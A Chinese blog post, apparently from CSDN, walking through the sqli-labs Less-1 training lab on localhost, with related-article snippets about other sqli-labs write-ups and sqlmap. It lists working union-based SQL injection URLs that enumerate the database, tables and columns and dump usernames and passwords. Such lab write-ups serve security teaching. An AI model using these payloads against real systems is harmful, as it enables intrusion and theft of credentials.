SQLi-less-1

最新推荐文章于 2024-03-18 09:04:17 发布
最新推荐文章于 2024-03-18 09:04:17 发布
阅读量157 收藏 1
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/morningstar929/article/details/108457775
版权

1.判断字符型还是整型注入

http://127.0.0.1/sqli/Less-1/?id=1 正常
http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 与上述一样
http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 与上述一样
由此可以判断不是整型注入
http://127.0.0.1/sqli/Less-1/?id=1%27%20and%201=1%20–+ 与上述一样
http://127.0.0.1/sqli/Less-1/?id=1%27%20and%201=2%20–+ 异常
由此可以判断存在字符型注入

2.使用order by查询该数据表的字段数量

http://127.0.0.1/sqli/Less-1/?id=1’ order by 3 --+ 正常
http://127.0.0.1/sqli/Less-1/?id=1’ order by 4 --+ 异常
由此判断存在3个字段

3.判断数据呈现位置

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,3 --+
根据结果,判断数据呈现位置为2,3

4.获取数据库名

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,(database()) --+

5.获取数据库表名

在mysql中,可以通过查询information_schema表来获取响应的数据库表名和字段名
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’) --+
通过结果可以获得相应的数据库表名

6.获取字段名

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’) --+
通过结果可以获得响应的字段名

7.获得数据

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,(select group_concat(username,0x3a,password) from security.users) --+
最终获得数据

morningstar929
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL注入-SQLi-Less1笔记
游离态De猫
07-06 385
MySQL注入-SQLi-Less1
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 404
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
sqli注入详解——>sqli-labs less-1~65
最新发布
qq_51780583的博客
03-18 627
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2582
sqli-labs靶场之前建议补一下基础。
Sqli-labs Less-1 报错注入
04-14 386
Sqli-labs Less-1 报错注入 1、首先打开less1后是一个页面,提示输入id作为参数。输入id=1试一下。 然后会出现,name 和 password,添加一个单引号 ' 测试一下注入点。 输入单引号发现,会直接将报错结果显示在页面中这里就可以尝试报错注入,将用户、数据库名称都爆破出来。 这里我们使用updatexml函数获取user()值。下图可以看到报错注入确实有效,我们看到用户为root,接下来爆数据库的名字。 0x7e是 '~' 的ASCII编码。 /sq.
sqlmap sqli less-1
记录笔记
04-11 586
python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -dbs python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -D security -tablespython python sqlmap.py -u “http://192.168.1..
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
sqli-labs PoC 脚本.rar
08-09
课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
SQLI-Lab】-Less1
xinyue9966的博客
01-20 223
SQLI-Less1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)前言一、GET单引号字符型注入二、步骤总结 前言 一、GET单引号字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 http://192.168.135.149/sqli/Less-1/?id=1' and 1=1 -
sqli less-01
ANYOUZHEN的博客
04-29 1306
我们试着输入id=1,查看是否有回显 接着输入id=1',发现出现报错 构造payload查询列表,?id=1' order by 3--+ 当我们输入?id=1' order by 4--+时出现了unknown,说明列表为3 接下来我们使用联合查询,?id=-1' union select 1,2,3--+; 然后发现2,3列有回应,说明可以爆破出数据库,列,用户和密码 接下来我们查询数据库,http://127.0.0.1/sqli/Less-1/?id=-1' union
sqli-labs Less-1~4(sqli-labs闯关指南 1—4)
m0_54899775的博客
12-14 1183
sqli-labs Less-1 sqli-labs Less-2 sqli-labs Less-3 sqli-labs Less-4 sqli-labs Less-1~4(sqli-labs闯关指南 1—4) sqlilab注入天书1-4 sql注入
Sqli-Labs之less-1
ISNS的博客
02-03 1768
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 534
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
[网络安全]sqli-labs Less-1 解题详析
等风来
04-27 1945
以上为[网络安全]sqli-labs Less-1 解题详析,后续将分享[网络安全]sqli-labs Less-2 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 869
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
sqli-labs-less
07-25
- *1* *2* *3* [sqli-labs-less-1完整解析,小白干货](https://blog.csdn.net/qq_46432288/article/details/109226871)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值